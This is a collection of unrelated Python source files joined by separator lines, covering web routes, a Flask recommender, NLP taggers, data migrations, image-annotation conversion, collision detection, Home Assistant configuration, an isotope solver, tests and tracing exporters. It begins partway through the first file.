        if not isinstance(other, V1KubeVirtWorkloadUpdateStrategy):
            return False
        # Compares the private backing fields via __dict__.
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
|
from django.conf.urls import url
from django.views.generic import TemplateView
from . import views
# URL routes for the story app.  Django matches patterns top-to-bottom, so
# the most specific line/part routes are listed before the generic ones.
# Prefix convention: l<pk> = story line, p<pk> = story part, s<pk> = story.
urlpatterns = [
    # Add a modification to a story part (shared CreateStoryPart view in "mod" mode).
    url(r"^l(?P<line_pk>\d+)/p(?P<part_pk>\d+)/modifications/add/$", views.CreateStoryPart.as_view(view_mode="mod"), name="story_detail_line_part_modification_add"),
    # List the modifications attached to a story part.
    url(r"^l(?P<line_pk>\d+)/p(?P<part_pk>\d+)/modifications/$", views.DetailStoryLineModifications.as_view(), name="story_detail_line_part_modifications"),
    # Add a variant to a story part (shared view in "variant" mode).
    url(r"^l(?P<line_pk>\d+)/p(?P<part_pk>\d+)/variants/add/$", views.CreateStoryPart.as_view(view_mode="variant"), name="story_detail_line_part_variant_add"),
    # List the variants attached to a story part.
    url(r"^l(?P<line_pk>\d+)/p(?P<part_pk>\d+)/variants/$", views.DetailStoryLineVariants.as_view(), name="story_detail_line_part_variants"),
    # Create the next part following an existing part ("next" mode).
    url(r"^l(?P<line_pk>\d+)/p(?P<part_pk>\d+)/next/$", views.CreateStoryPart.as_view(view_mode="next"), name="story_detail_line_part_next"),
    # Detail view for a single story line.
    url(r"^l(?P<line_pk>\d+)/$", views.DetailStoryLine.as_view(), name="story_detail_line"),
    # Edit and detail views for a whole story.
    url(r"^s(?P<story_pk>\d+)/edit/$", views.EditStory.as_view(), name="story_edit"),
    url(r"^s(?P<story_pk>\d+)/$", views.DetailStory.as_view(), name="story_detail"),
    # Story collection views.
    url(r"^list/$", views.ListStories.as_view(), name="story_list"),
    url(r"^add/$", views.CreateStory.as_view(), name="story_create"),
    # Static landing page for the app.
    url(r"^$", TemplateView.as_view(template_name="story/index.html"), name="story_index"),
]
#-*- coding: utf8 -*-
# Flask web service serving recommendations for the "participa" platform.
# NOTE: this module is Python 2 (`__builtin__`, `cPickle`, print statements).
from flask import Flask, render_template, make_response, session, redirect, url_for, escape, request,jsonify,Response
import __builtin__, datetime
from dateutil import parser
import time as T, networkx as x, json # json.dumps
import cPickle as pickle, string
from SPARQLWrapper import SPARQLWrapper, JSON
# Wall-clock reference used to report how long startup / cache loading takes.
atime=T.time()
from configuracao import *
from auxiliar import *
# Try to restore the precomputed graphs and bag-of-words caches from disk.
# Globals are stashed on __builtin__ so every imported module can see them.
try:
    __builtin__.g=pickle.load( open( "pickledir/g.p", "rb" ) )
    __builtin__.d=pickle.load( open( "pickledir/d.p", "rb" ) )
    __builtin__.bow=pickle.load( open( "pickledir/bow.p", "rb" ) )
    __builtin__.radicais_escolhidos=pickle.load( open( "pickledir/radicais_escolhidos.p", "rb" ) )
    __builtin__.bows=pickle.load( open( "pickledir/bows.p", "rb" ) )
    print(T.time()-atime)
# NOTE(review): bare except swallows *any* failure (including pickle
# corruption or a KeyboardInterrupt) and rebuilds everything from scratch.
# Intentional best-effort cache, but a narrower exception list would be safer.
except:
    fazRedeAmizades()
    print(T.time()-atime)
    fazRedeInteracao()
    print(T.time()-atime)
    fazBoW()
    print(T.time()-atime)
    fazBoWs()
    print(T.time()-atime)
import rotinasRecomendacao
app = Flask(__name__)
@app.route("/hello2/")
def foo():
    """Liveness-check endpoint; always returns a constant string."""
    return "bar3"
@app.route("/hello5/")
def foo2():
    """Second liveness-check endpoint; always returns a constant string."""
    return "bar5"
@app.route("/atualiza/")
def atualiza():
    """Rebuild every cached structure and report cumulative timings."""
    start = T.time()
    timings = []
    # Rebuild steps run in dependency order; each entry records the
    # cumulative elapsed time after that step completed.
    for rebuild in (fazRedeAmizades, fazRedeInteracao, fazBoW, fazBoWs):
        rebuild()
        timings.append(str(T.time() - start))
    return "atualizado!" + "<br />".join(timings)
@app.route("/tudo")
def tudo():
    """Echo endpoint combining the 'coisa' and 'aquela' query parameters."""
    coisa = request.args.get("coisa")
    aquela = request.args["aquela"]
    return "tudo" + coisa + aquela
@app.route("/recomenda/")
def recomenda():
    """Resource recommendation endpoint for the "participa" platform.

    Query parameters:
    =================
    recurso: the resource type to recommend: participante, comunidade,
        trilha, artigo or comentario.
    destinatario: who the recommendation is for: participante, comunidade
        or linha_editorial.  Auxiliary field ``idd`` carries the recipient
        id (the identifier column of the profiles table).
    metodo: recommendation method: top(ologico), tex(tual) or hib(rido).
        Auxiliary field ``polaridade``: sim(ilar), dis(similar) or mis(ta).

    Example:
    ========
    http://<urlDoServidor>/recomenda?recurso=participante&destinatario=comunidade&idd=mirosc&metodo=topologico&polaridade=mis&ordenacao=intercalada
    """
    recurso = request.args.get("recurso")
    destinatario = request.args.get("destinatario")
    idd = request.args.get("idd")
    metodo = request.args.get("metodo")
    polaridade = request.args.get("polaridade")
    ordenacao = request.args.get("ordenacao")  # read but currently unused
    # Dispatch table replaces the if-chain.  Also fixes a latent bug: an
    # unknown ``recurso`` previously left ``rec`` unbound, crashing with a
    # NameError (HTTP 500) at the json.dumps call below.
    handlers = {
        "participante": rotinasRecomendacao.recomendaParticipante,
        "comunidade": rotinasRecomendacao.recomendaComunidade,
        "trilha": rotinasRecomendacao.recomendaTrilha,
        "artigo": rotinasRecomendacao.recomendaArtigo,
        "comentario": rotinasRecomendacao.recomendaComentario,
    }
    handler = handlers.get(recurso)
    # Unknown resource types now return JSON null instead of a server error.
    rec = handler(destinatario, idd, metodo, polaridade) if handler else None
    return json.dumps(rec)
if __name__ == "__main__":
    # Development entry point: debug server with auto-reload enabled.
    app.debug = True
    # Report total startup time (Python 2 print statement).
    print T.time()-atime
    #app.run(host='0.0.0.0.0')
    #app.run(host='localhost',port=83)
    #app.run(host='127.0.0.1',port=84)
    app.run(host='127.0.0.1',port=884)
|
# -*- coding: utf-8 -*-
"""Parts-of-speech tagger implementations."""
from __future__ import absolute_import
import nltk
import textblob.compat
import textblob as tb
from textblob.en import tag as pattern_tag
from textblob.decorators import requires_nltk_corpus
from textblob.base import BaseTagger
class PatternTagger(BaseTagger):
    """Tagger that uses the implementation in
    Tom de Smedt's pattern library
    (http://www.clips.ua.ac.be/pattern).
    """

    def tag(self, text, tokenize=True):
        """POS-tag a string or BaseBlob using pattern's tagger."""
        # BaseBlob-like inputs expose their underlying string as ``raw``.
        raw = text if isinstance(text, textblob.compat.text_type) else text.raw
        return pattern_tag(raw, tokenize)
class NLTKTagger(BaseTagger):
    """Tagger that uses NLTK's standard TreeBank tagger.

    NOTE: Requires numpy. Not yet supported with PyPy.
    """

    @requires_nltk_corpus
    def tag(self, text):
        """POS-tag a string or BaseBlob with ``nltk.tag.pos_tag``."""
        # Plain strings are promoted to TextBlob so ``.tokens`` is available.
        blob = tb.TextBlob(text) if isinstance(text, textblob.compat.text_type) else text
        return nltk.tag.pos_tag(blob.tokens)
|
# Generated by Django 2.1.5 on 2019-01-10 21:18
from django.db import migrations
import os
import csv
#Locate csv file to import
# The CSV ships alongside this migration module, so the path is derived from
# the module location rather than from the current working directory.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
CAT_FILE = os.path.join(BASE_DIR, 'art_data.csv')
def insert_categories(apps, schema_editor):
    """Create a Category row for every distinct ``classification`` in the CSV.

    Uses the historical model via ``apps.get_model`` (required in data
    migrations) and skips classifications that already exist.
    """
    Category = apps.get_model('core', 'Category')
    # A set gives O(1) membership tests; the original list made the loop
    # O(rows * categories).
    categories = set(Category.objects.all().values_list('name', flat=True))
    with open(CAT_FILE, mode='r') as csv_file:
        for row in csv.DictReader(csv_file):
            name = row['classification']
            if name not in categories:
                Category.objects.create(name=name)
                categories.add(name)
class Migration(migrations.Migration):
    """Data migration seeding Category rows from art_data.csv."""

    dependencies = [
        ('core', '0012_auto_20190109_2235'),
    ]

    operations = [
        # noop reverse makes the migration reversible: unapplying it simply
        # leaves the inserted categories in place instead of erroring out.
        migrations.RunPython(insert_categories, migrations.RunPython.noop)
    ]
|
"""CFNgin hook for cleaning up resources prior to CFN stack deletion."""
# pylint: disable=unused-argument
# TODO move to runway.cfngin.hooks on next major release
import logging
LOGGER = logging.getLogger(__name__)
def delete_param(context, provider, **kwargs):
    """Delete an SSM parameter; a missing parameter is treated as success."""
    parameter_name = kwargs.get("parameter_name")
    if not parameter_name:
        raise ValueError("Must specify `parameter_name` for delete_param hook.")
    ssm_client = context.get_session().client("ssm")
    try:
        ssm_client.delete_parameter(Name=parameter_name)
    except ssm_client.exceptions.ParameterNotFound:
        # Already gone: log it and fall through to success.
        LOGGER.info('parameter "%s" does not exist', parameter_name)
    return True
|
import numpy as np
from imantics import Polygons, Mask
import cv2
from csv import reader
import os
import json
# Convert Open Images instance-segmentation data into a COCO-style
# annotation file for the resized training images.
image_folder = "C:\\Users\\Admin\\Documents\\open-images-1\\train_resized"
# COCO skeleton: images / annotations / categories sections.
coco_dict = {}
coco_dict['images'] = []
coco_dict['annotations'] = []
coco_dict['categories'] = []
# Per-instance mask rows; based on usage below: col 0 = mask path,
# col 1 = image id, col 2 = label, cols 4-7 = relative box coordinates.
with open('C:\\Users\\Admin\\Documents\\open-images-1\\challenge-2019-train-segmentation-masks.csv') as read_obj:
    csv_reader = reader(read_obj)
    csv_list = list(csv_reader)
# Class id -> human-readable class name mapping.
with open('C:\\Users\\Admin\\Documents\\open-images-1\\challenge-2019-classes-description-segmentable.csv') as read_obj:
    csv_cat_reader = reader(read_obj)
    cat_list = list(csv_cat_reader)
# Index mask rows by image id once — the original rescanned the entire CSV
# for every image, making the conversion O(images * rows).
rows_by_image = {}
for row in csv_list:
    rows_by_image.setdefault(row[1], []).append(row)
for image_file in os.listdir(image_folder):
    image = cv2.imread(image_folder + '\\' + image_file)
    height = image.shape[0]
    width = image.shape[1]
    image_id = os.path.splitext(image_file)[0]
    for row in rows_by_image.get(image_id, []):
        mask_image_path = row[0]
        label_name = row[2]
        # Box coordinates in the CSV are relative; convert to pixels.
        x_min = float(row[4]) * width
        x_max = float(row[5]) * width
        y_min = float(row[6]) * height
        y_max = float(row[7]) * height
        mask_image = cv2.imread('C:\\Users\\Admin\\Documents\\open-images-1\\masks' + '\\' + mask_image_path, 0)
        idx = os.path.splitext(mask_image_path)[0]
        print(idx)
        # Trace mask outlines into COCO polygon segmentation format.
        polygons = Mask(mask_image).polygons()
        coco_dict['annotations'].append({
            'id': idx,
            'image_id': image_id,
            'category_id': label_name,
            'segmentation': polygons.segmentation,
            # NOTE(review): COCO convention is [x, y, width, height]; this
            # script intentionally stores [x_min, y_min, x_max, y_max]
            # (see output filename "train_1_XYXY.json").
            'bbox': [float(x_min), float(y_min), float(x_max), float(y_max)],
            'iscrowd': 0
        })
    coco_dict['images'].append({
        'file_name': str(image_file),
        'height': height,
        'width': width,
        'id': image_id
    })
for i in range(len(cat_list)):
    coco_dict['categories'].append({
        'id': cat_list[i][0],
        'name': str(cat_list[i][1]),
        'supercategory': str(cat_list[i][1])
    })
with open('train_1_XYXY.json', 'w') as fp:
    json.dump(coco_dict, fp)
|
from typing import Tuple
import numpy as np
from shapely.geometry import LineString, Polygon
def _get_boundingbox(centroid: np.ndarray, yaw: float, extent: np.ndarray) -> Polygon:
    """Build the rotated rectangular footprint of an agent as a Polygon.

    The rectangle is centred on ``centroid``, rotated by ``yaw``, with
    half-sizes ``extent[0] / 2`` and ``extent[1] / 2``.
    """
    cx, cy = centroid[0], centroid[1]
    sin_y, cos_y = np.sin(yaw), np.cos(yaw)
    half_w, half_l = extent[0] / 2, extent[1] / 2
    # Corner offsets in the body frame, in the same winding order as the
    # original four-corner construction.
    local_corners = [(half_w, half_l), (half_w, -half_l), (-half_w, -half_l), (-half_w, half_l)]
    world_corners = [
        [cx + u * cos_y - v * sin_y, cy + u * sin_y + v * cos_y]
        for u, v in local_corners
    ]
    return Polygon(world_corners)
def _get_sides(bbox: Polygon) -> Tuple[LineString, LineString, LineString, LineString]:
    """Split a rectangle's boundary into its four edges.

    The edges pair up the corners exactly as the original implementation:
    (p1-p2, p3-p4, p1-p4, p2-p3); callers interpret them as
    (front, rear, left, right).
    """
    p1, p2, p3, p4 = bbox.exterior.coords[:-1]  # drop repeated closing point
    return (
        LineString([p1, p2]),
        LineString([p3, p4]),
        LineString([p1, p4]),
        LineString([p2, p3]),
    )
def within_range(ego_centroid: np.ndarray, ego_extent: np.ndarray, agents: np.ndarray) -> np.ndarray:
    """Pre-filter agents to those close enough to ego to possibly collide.

    An agent is kept when the centroid distance is below the sum of the two
    bounding-circle radii (half the diagonal of each footprint's x/y extent).

    :param ego_centroid: (2,) ego x/y position
    :param ego_extent: (3,) ego extent; only the first two components are used
    :param agents: structured array with at least "centroid" and "extent" fields
    :return: the subset of ``agents`` within collision range
    """
    agent_centroids = agents["centroid"]
    agent_extents = agents["extent"]
    distance = np.linalg.norm(ego_centroid - agent_centroids, axis=-1)
    # BUG FIX: the original used agent_extents[:, 2] (the third/height
    # column), which collapses all agents into a single scalar norm and
    # ignores the planar footprint entirely.  The x/y columns are needed:
    # agent_extents[:, :2].
    max_range = 0.5 * (np.linalg.norm(ego_extent[:2]) + np.linalg.norm(agent_extents[:, :2], axis=-1))
    return agents[distance < max_range]
def detect_collision(
    pred_centroid: np.ndarray, pred_yaw: float, pred_extent: np.ndarray, target_agents: np.ndarray
) -> Tuple[str, str]:
    """
    Computes whether a collision occurred between ego and any other agent,
    and classifies it as rear, front, or side.

    Each of ego's four edges is intersected with the colliding agent's box;
    the edge with the longest intersection determines the class (e.g. a
    front collision exhibits the longest overlap with ego's front edge).
    """
    ego_bbox = _get_boundingbox(centroid=pred_centroid, yaw=pred_yaw, extent=pred_extent)
    # Labels are aligned with the side order returned by _get_sides:
    # (front, rear, left, right) -> left/right both report "side".
    side_labels = ("front", "rear", "side", "side")
    for agent in within_range(pred_centroid, pred_extent, target_agents):
        agent_bbox = _get_boundingbox(agent["centroid"], agent["yaw"], agent["extent"])
        if not ego_bbox.intersects(agent_bbox):
            continue
        overlap_lengths = np.asarray(
            [agent_bbox.intersection(side).length for side in _get_sides(ego_bbox)]
        )
        return side_labels[int(np.argmax(overlap_lengths))], agent["track_id"]
    return "", ""
|
# Payroll script: computes an employee's net salary from base pay,
# deductions, allowances and overtime (amounts in pesos).
valorhora= 20000
horastrabajadas=120
horasextra=10
# Overtime hours are paid with a 25% surcharge over the regular hourly rate.
valorhoraextra=((valorhora*0.25)+valorhora)
recibidoporhoraextra=(valorhoraextra*horasextra)
sueldobase=(valorhora*horastrabajadas)
print("El sueldo base del empleado es de:", str(sueldobase),"pesos.")
# Deductions are a flat 14% of the base salary.
deducciones=(sueldobase*0.14)
Sueldomenosdeducciones=(sueldobase-deducciones)
print("El sueldo base menos las deducciones es de:", str(Sueldomenosdeducciones),"pesos.")
# Fixed allowance for academic development.
Actualizaciónacademica=250000
total1=(Sueldomenosdeducciones+Actualizaciónacademica)
print("Añadiendo la actualización académica de 250.000 pesos:", str(total1),"pesos.")
# Child subsidy: 173,000 pesos for each of the 3 children.
dinerohijos=(3*173000)
total2=(total1+dinerohijos)
print("Añadiendo subsidio para los 3 hijos:", str(total2), "pesos.")
# Housing bonus.
bonohogar=180000
total3=(total2+bonohogar)
print("Añadiendo el bono Hogar", str(total3),"pesos.")
# Finally add the overtime pay to obtain the net salary.
total4=(total3+recibidoporhoraextra)
print("Más las horas extra trabajadas el salario neto sería de:", str(total4), "pesos.")
"""Support for Alexa skill service end point."""
import logging
import voluptuous as vol
from homeassistant.const import CONF_NAME
from homeassistant.core import callback
from homeassistant.helpers import config_validation as cv, entityfilter
from . import flash_briefings, intent, smart_home_http
from .const import (
CONF_AUDIO,
CONF_CLIENT_ID,
CONF_CLIENT_SECRET,
CONF_DESCRIPTION,
CONF_DISPLAY_CATEGORIES,
CONF_DISPLAY_URL,
CONF_ENDPOINT,
CONF_ENTITY_CONFIG,
CONF_FILTER,
CONF_LOCALE,
CONF_SUPPORTED_LOCALES,
CONF_TEXT,
CONF_TITLE,
CONF_UID,
DOMAIN,
EVENT_ALEXA_SMART_HOME,
)
_LOGGER = logging.getLogger(__name__)
CONF_FLASH_BRIEFINGS = "flash_briefings"
CONF_SMART_HOME = "smart_home"
DEFAULT_LOCALE = "en-US"
# Per-entity overrides available under the smart home entity_config section.
ALEXA_ENTITY_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_DESCRIPTION): cv.string,
        vol.Optional(CONF_DISPLAY_CATEGORIES): cv.string,
        vol.Optional(CONF_NAME): cv.string,
    }
)
# Configuration for the Smart Home skill endpoint; every key is optional.
SMART_HOME_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_ENDPOINT): cv.string,
        vol.Optional(CONF_CLIENT_ID): cv.string,
        vol.Optional(CONF_CLIENT_SECRET): cv.string,
        vol.Optional(CONF_LOCALE, default=DEFAULT_LOCALE): vol.In(
            CONF_SUPPORTED_LOCALES
        ),
        vol.Optional(CONF_FILTER, default={}): entityfilter.FILTER_SCHEMA,
        vol.Optional(CONF_ENTITY_CONFIG): {cv.entity_id: ALEXA_ENTITY_SCHEMA},
    }
)
CONFIG_SCHEMA = vol.Schema(
    {
        DOMAIN: {
            # Each flash-briefing id maps to a list of briefing item templates.
            CONF_FLASH_BRIEFINGS: {
                cv.string: vol.All(
                    cv.ensure_list,
                    [
                        {
                            vol.Optional(CONF_UID): cv.string,
                            vol.Required(CONF_TITLE): cv.template,
                            vol.Optional(CONF_AUDIO): cv.template,
                            vol.Required(CONF_TEXT, default=""): cv.template,
                            vol.Optional(CONF_DISPLAY_URL): cv.template,
                        }
                    ],
                )
            },
            # vol.Optional here would mean we couldn't distinguish between an empty
            # smart_home: and none at all.
            CONF_SMART_HOME: vol.Any(SMART_HOME_SCHEMA, None),
        }
    },
    extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
    """Activate the Alexa component."""

    @callback
    def async_describe_logbook_event(event):
        """Describe a logbook event."""
        data = event.data
        entity_id = data["request"].get("entity_id")
        command = f"{data['request']['namespace']}/{data['request']['name']}"
        if entity_id:
            state = hass.states.get(entity_id)
            target = state.name if state else entity_id
            message = f"send command {command} for {target}"
        else:
            message = f"send command {command}"
        return {
            "name": "Amazon Alexa",
            "message": message,
            "entity_id": entity_id,
        }

    hass.components.logbook.async_describe_event(
        DOMAIN, EVENT_ALEXA_SMART_HOME, async_describe_logbook_event
    )

    if DOMAIN not in config:
        return True

    config = config[DOMAIN]
    flash_briefings_config = config.get(CONF_FLASH_BRIEFINGS)

    intent.async_setup(hass)

    if flash_briefings_config:
        flash_briefings.async_setup(hass, flash_briefings_config)

    # An explicitly empty `smart_home:` section still enables smart home with
    # default settings; an absent key disables it entirely.
    if CONF_SMART_HOME in config:
        smart_home_config = config[CONF_SMART_HOME] or SMART_HOME_SCHEMA({})
        await smart_home_http.async_setup(hass, smart_home_config)

    return True
|
"""
This solver implements the double spike equations from the
double-spike toolbox. Other places too, but that's the most popular
reference. Code by Alex Tennant.
Questions to alexpattennant@gmail.com
"""
import numpy as np
from numpy import warnings
from scipy.optimize import fsolve
from scipy.optimize import least_squares
import math
def UseAnneal(Sample, Spike, Standard, Mass, RatioMass, p):
    """Solve the double-spike equations with scipy's least_squares.

    Alternative solver minimizing the residuals of the double-spike system
    starting from the initial guess ``p``.

    :param Sample: measured sample ratios
    :param Spike: known spike ratios
    :param Standard: known standard ratios
    :param Mass: isotope masses (numerators of the ratios)
    :param RatioMass: mass of the ratio-denominator isotope
    :param p: initial guess [alpha, beta, lambda]
    :return: (alpha, beta, lamb, success); "No Convergence" strings with
        success=False when a RuntimeWarning is raised (warnings are promoted
        to errors by DSpikeSolve's simplefilter call)
    """
    def equation(x):
        # Residuals of: Std_i*(M_i/RM)^-alpha * lam + Spk_i*(1-lam)
        #               - Smp_i*(M_i/RM)^-beta = 0
        return np.array([Standard[i] * (Mass[i] / RatioMass) ** (-x[0]) * x[2]
                         + Spike[i] * (1 - x[2])
                         - Sample[i] * (Mass[i] / RatioMass) ** (-x[1])
                         for i in range(len(Spike))])

    try:
        # Pass the residual function directly (the original wrapped it in a
        # redundant lambda); leftover commented-out debug prints removed.
        result = least_squares(equation, x0=p)
        alpha, beta, lamb = result.x[0], result.x[1], result.x[2]
        return alpha, beta, lamb, True
    except RuntimeWarning:
        # Consistent "No Convergence" markers (the original mixed
        # "NoConvergence" and "No Convergence").
        return "No Convergence", "No Convergence", "No Convergence", False
def DSpikeSolve(Sample, Spike, Standard, Mass, RatioMass, Anneal=False):
    """
    Solve the non-linear double-spike equations, using the linearized
    system's solution as the initial guess.

    :param Sample: ratios of the measured sample
    :param Spike: known spike ratios
    :param Standard: known standard ratios
    :param Mass: known isotope masses (ratio numerators)
    :param RatioMass: mass of the denominator isotope of the ratios
    :param Anneal: unused here; kept for interface compatibility
    :return: (alpha, beta, lamb, success); "No Convergence" strings and
        success=False when fsolve raises a RuntimeWarning
    """
    # Linearized system provides a starting point for the root finder.
    # np.array replaces the deprecated np.matrix; np.linalg.solve is
    # unchanged by this.
    A = np.array(
        [[Spike[i] - Standard[i],
          -Standard[i] * math.log(Mass[i] / RatioMass),
          Sample[i] * math.log(Mass[i] / RatioMass)] for i in range(len(Spike))])
    b = np.array([Sample[i] - Standard[i] for i in range(len(Spike))])
    x = np.linalg.solve(A, b)
    x1 = [x.item(0), x.item(1), x.item(2)]
    # Initial guess derived from the linear solution.
    p = [x1[1] / (1 - x1[0]), x1[2], 1 - x1[0]]

    def equation(x):
        # Residuals of the full non-linear double-spike system.
        return np.array([Standard[i] * (Mass[i] / RatioMass) ** (-x[0]) * x[2]
                         + Spike[i] * (1 - x[2])
                         - Sample[i] * (Mass[i] / RatioMass) ** (-x[1])
                         for i in range(len(Spike))])

    # Promote RuntimeWarnings to errors so non-convergence becomes catchable.
    warnings.simplefilter("error", RuntimeWarning)
    try:
        # Leftover "I AM SAMPLE/STANDARD/SPIKE/INITIAL" debug prints removed.
        alpha, beta, lamb = fsolve(equation, x0=p, xtol=1e-10, maxfev=10000, factor=0.5)
        return alpha, beta, lamb, True
    except RuntimeWarning:
        return "No Convergence", "No Convergence", "No Convergence", False
def ConcentrationCalculation(alpha, alpha2, Standard, Spike, Mass, RatioMass, ADS, PercentSpike):
    """Compute the sample concentration by isotope dilution.

    Builds a fractionation-corrected sample composition, derives atomic
    weights for sample and spike, then applies the isotope-dilution formula.

    :param alpha: fractionation factor of the sample
    :param alpha2: reference fractionation factor (subtracted from alpha)
    :param Standard: standard ratios
    :param Spike: spike ratios
    :param Mass: isotope masses (ratio numerators)
    :param RatioMass: mass of the ratio-denominator isotope
    :param ADS: amount of double spike added
    :param PercentSpike: fraction of spike in the mixture
    :return: concentration, or the string "DivByZero" when PercentSpike is 0
    """
    # Normalization sums: the denominator isotope contributes ratio 1.0 each.
    S = 1.0
    T = 1.0
    Sample = [0.0] * len(Standard)
    for i in range(len(Standard)):
        S += float(Standard[i])
        T += float(Spike[i])
        # Fractionation-correct the standard composition.
        Sample[i] = float(Standard[i]) * (float(Mass[i]) / float(RatioMass)) ** (-(alpha - alpha2))
    # Abundances of the corrected sample; the last slot is the denominator.
    P = [0.0] * (len(Standard) + 1)
    for i in range(len(Standard)):
        P[i] = Sample[i] / S
    P[-1] = 1 / S
    # Atomic weight of the sample.
    AW = 0.0
    for i in range(len(P) - 1):
        AW += P[i] * float(Mass[i])
    AW += P[-1] * float(RatioMass)
    # Atomic weight of the double spike.
    DSAW = 0.0
    for i in range(len(Spike)):
        DSAW += float(Spike[i]) * float(Mass[i]) / T
    DSAW += RatioMass / T
    try:
        concentration = (ADS / DSAW) * (1 / PercentSpike - 1) * AW
    # BUG FIX: division by zero raises ZeroDivisionError, not RuntimeWarning,
    # so the original never actually returned "DivByZero".
    except (ZeroDivisionError, RuntimeWarning):
        concentration = "DivByZero"
    return concentration
|
import numpy as np
import pytest
from ..flag import (
slice_full_edge_masked,
slice_has_flags,
compute_masked_fraction)
@pytest.mark.parametrize(
    'inds',
    [(range(10), 0),   # left column fully masked
     (range(10), -1),  # right column fully masked
     (0, range(10)),   # top row fully masked
     (-1, range(10))   # bottom row fully masked
     ])
def test_slice_full_edge_masked(inds):
    """A fully masked edge must flag the slice, via weight=0 or bmask bits."""
    weight = np.ones((10, 10))
    bmask = np.zeros((10, 10), dtype=np.int32)
    bmask[:, 0] = 4  # a bit NOT in bad_flags; must be ignored
    bad_flags = np.int32(2**0)

    # Edge masked through zero weight.
    zero_weight = weight.copy()
    zero_weight[inds] = 0
    assert slice_full_edge_masked(
        weight=zero_weight, bmask=bmask, bad_flags=np.int32(0))

    # Edge masked through bad bmask flags.
    flagged = bmask.copy()
    flagged[inds] = 2**0
    assert slice_full_edge_masked(
        weight=weight, bmask=flagged, bad_flags=bad_flags)
@pytest.mark.parametrize(
    'inds',
    [(5, 0),   # single pixel on the left edge
     (5, -1),  # single pixel on the right edge
     (0, 5),   # single pixel on the top edge
     (-1, 5)   # single pixel on the bottom edge
     ])
def test_slice_full_edge_masked_one_pix(inds):
    """A single masked edge pixel must NOT flag the slice."""
    weight = np.ones((10, 10))
    bmask = np.zeros((10, 10), dtype=np.int32)
    bad_flags = 2**0

    zero_weight = weight.copy()
    zero_weight[inds] = 0
    assert not slice_full_edge_masked(
        weight=zero_weight, bmask=bmask, bad_flags=0)

    flagged = bmask.copy()
    flagged[inds] = 2**0
    assert not slice_full_edge_masked(
        weight=weight, bmask=flagged, bad_flags=bad_flags)
def test_compute_masked_fraction():
    """2 of 100 pixels masked (one by weight, one by flags) -> 0.02."""
    weight = np.ones((10, 10))
    bmask = np.zeros((10, 10), dtype=np.int32)
    bad_flags = 2**0
    weight[4, 7] = 0.0
    bmask[7, 9] = 4     # bit outside bad_flags: not counted
    bmask[8, 2] = 2**0  # bit inside bad_flags: counted
    frac = compute_masked_fraction(
        weight=weight, bmask=bmask, bad_flags=bad_flags)
    assert frac == 0.02
def test_slice_has_flags():
    """Only bits present in ``flags`` should trigger a positive result."""
    bmask = np.zeros((10, 10), dtype=np.int32)
    flags = 2**0
    bmask[6, 7] = 4  # different bit: no hit
    assert not slice_has_flags(bmask=bmask, flags=flags)
    bmask[6, 6] = 2**0  # matching bit: hit
    assert slice_has_flags(bmask=bmask, flags=flags)
def test_compute_masked_fraction_ignore_mask():
    """Ignored pixels drop out of numerator and denominator: 2 / 99."""
    weight = np.ones((10, 10))
    bmask = np.zeros((10, 10), dtype=np.int32)
    bad_flags = 2**0
    weight[4, 7] = 0.0
    bmask[7, 9] = 4     # bit outside bad_flags: not counted
    bmask[8, 2] = 2**0
    bmask[3, 3] = 2**0  # masked, but ignored below
    ignore_mask = np.zeros_like(bmask).astype(bool)
    ignore_mask[3, 3] = 1
    frac = compute_masked_fraction(
        weight=weight,
        bmask=bmask,
        bad_flags=bad_flags,
        ignore_mask=ignore_mask,
    )
    assert frac == 2/99
def test_compute_masked_fraction_ignore_mask_all():
    """When every pixel is ignored the masked fraction comes out as 1.0."""
    weight = np.ones((10, 10))
    bmask = np.zeros((10, 10), dtype=np.int32)
    bad_flags = 2**0
    weight[4, 7] = 0.0
    bmask[7, 9] = 4  # bit outside bad_flags
    bmask[8, 2] = 2**0
    bmask[3, 3] = 2**0
    ignore_mask = np.ones_like(bmask).astype(bool)
    frac = compute_masked_fraction(
        weight=weight,
        bmask=bmask,
        bad_flags=bad_flags,
        ignore_mask=ignore_mask,
    )
    assert frac == 1.0
|
# Copyright 2019, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import typing
from enum import Enum
from .. import Span, SpanProcessor
logger = logging.getLogger(__name__)
class SpanExportResult(Enum):
    """Result code returned by :meth:`SpanExporter.export`."""

    # Export succeeded.
    SUCCESS = 0
    # Export failed but may succeed on retry.
    FAILED_RETRYABLE = 1
    # Export failed permanently; retrying will not help.
    FAILED_NOT_RETRYABLE = 2
class SpanExporter:
    """Interface for exporting spans.
    Interface to be implemented by services that want to export recorded
    spans in their own format.
    To export data this MUST be registered to the :class`..Tracer` using a
    `SimpleExportSpanProcessor` or a `BatchSpanProcessor`.
    """
    def export(self, spans: typing.Sequence[Span]) -> "SpanExportResult":
        """Exports a batch of telemetry data.
        Args:
            spans: The list of `Span`s to be exported
        Returns:
            The result of the export
        """
        # NOTE(review): the base implementation returns None implicitly;
        # concrete exporters are expected to override this and return a
        # SpanExportResult.
    def shutdown(self) -> None:
        """Shuts down the exporter.
        Called when the SDK is shut down.
        """
class SimpleExportSpanProcessor(SpanProcessor):
    """SpanProcessor that forwards each ended span straight to the exporter.

    No buffering or batching is performed: every ``on_end`` triggers a
    synchronous :meth:`SpanExporter.export` call with a one-element tuple.
    """

    def __init__(self, span_exporter: SpanExporter):
        self.span_exporter = span_exporter

    def on_start(self, span: Span) -> None:
        # Nothing to do at span start for the simple processor.
        pass

    def on_end(self, span: Span) -> None:
        try:
            self.span_exporter.export((span,))
        # pylint: disable=broad-except
        except Exception as exc:
            # Export failures must never propagate into user code.
            logger.warning("Exception while exporting data: %s", exc)

    def shutdown(self) -> None:
        self.span_exporter.shutdown()
class ConsoleSpanExporter(SpanExporter):
    """Diagnostic :class:`SpanExporter` that prints every span to STDOUT."""

    def export(self, spans: typing.Sequence[Span]) -> SpanExportResult:
        for current_span in spans:
            print(current_span)
        return SpanExportResult.SUCCESS
|
